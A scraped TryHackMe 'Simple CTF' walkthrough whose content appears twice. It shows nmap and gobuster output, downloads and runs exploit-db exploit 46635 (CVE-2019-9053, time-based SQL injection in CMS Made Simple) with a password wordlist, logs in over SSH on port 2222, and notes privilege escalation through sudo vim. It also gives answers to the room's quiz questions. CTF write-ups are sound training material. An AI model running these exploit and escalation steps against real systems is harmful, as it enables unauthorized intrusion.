TryHackMe - SimpleCTF

Nmap

┌──(root💀kali)-[~]
└─# nmap -T5 -sC -sV -O -Pn -p- 10.10.61.2   
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 09:12 EDT
Nmap scan report for 10.10.61.2
Host is up (0.22s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.13.22.56
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (90%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 333.81 seconds

Gobuster

┌──(root💀kali)-[~]
└─# gobuster dir -u http://10.10.61.2/ --wildcard -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.61.2/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/05/08 09:30:20 Starting gobuster in directory enumeration mode
===============================================================
/simple               (Status: 301) [Size: 309] [--> http://10.10.61.2/simple/]

We take it in our kali wget https://www.exploit-db.com/download/46635
But we can also try to check if the creds would work with ssh (Remember to specify the port in your ssh command because it is not on default 22 port)
ssh mitch@10.10.104.30 -p 2222

Privesc

sudo -l we find out that vim is allowed

Questions

How many services are running under port 1000? Answer 2
What is running on the higher port? Answer ssh
What's the CVE you're using against the application? Answer CVE-2019-9053 reading the exploit we understand that the app is vulnerable to a time based SQL injection.
To what kind of vulnerability is the application vulnerable? Answer SQLi
What's the password? I will let you find this on your own
Where can you login with the details obtained? Answer ssh
What's the user flag? I will let you find this on your own. Hint: cat user.txt
Is there any other user in the home directory? What's its name? We do an ls /home and we find the user sunbath
What can you leverage to spawn a privileged shell? Answer vim
What's the root flag? I will let you find this on your own. Hint: cat /root/root.txt

PreviousTryHackMe - OWASP Top 10 2021 NextTryHackMe - SQL Injection Lab

Last updated 2 years ago

Nmap

┌──(root💀kali)-[~]
└─# nmap -T5 -sC -sV -O -Pn -p- 10.10.61.2   
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 09:12 EDT
Nmap scan report for 10.10.61.2
Host is up (0.22s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.13.22.56
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (90%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 333.81 seconds

Gobuster

┌──(root💀kali)-[~]
└─# gobuster dir -u http://10.10.61.2/ --wildcard -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.61.2/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/05/08 09:30:20 Starting gobuster in directory enumeration mode
===============================================================
/simple               (Status: 301) [Size: 309] [--> http://10.10.61.2/simple/]

We find a page using CMS made simple that has a cve. We can try this

We take it in our kali wget https://www.exploit-db.com/download/46635

python 46635 -u http://10.10.61.2/simple/ --crack -w /usr/share/seclists/Passwords/Common-Credentials/best110.txt

Once the credentials found we can login here http://10.10.61.2/simple/admin/login.php

But we can also try to check if the creds would work with ssh (Remember to specify the port in your ssh command because it is not on default 22 port)

ssh mitch@10.10.104.30 -p 2222

Questions

How many services are running under port 1000? Answer 2

What is running on the higher port? Answer ssh

What's the CVE you're using against the application? Answer CVE-2019-9053 reading the exploit we understand that the app is vulnerable to a time based SQL injection.

To what kind of vulnerability is the application vulnerable? Answer SQLi

What's the password? I will let you find this on your own

Where can you login with the details obtained? Answer ssh

What's the user flag? I will let you find this on your own. Hint: cat user.txt

Is there any other user in the home directory? What's its name? We do an ls /home and we find the user sunbath

What can you leverage to spawn a privileged shell? Answer vim

What's the root flag? I will let you find this on your own. Hint: cat /root/root.txt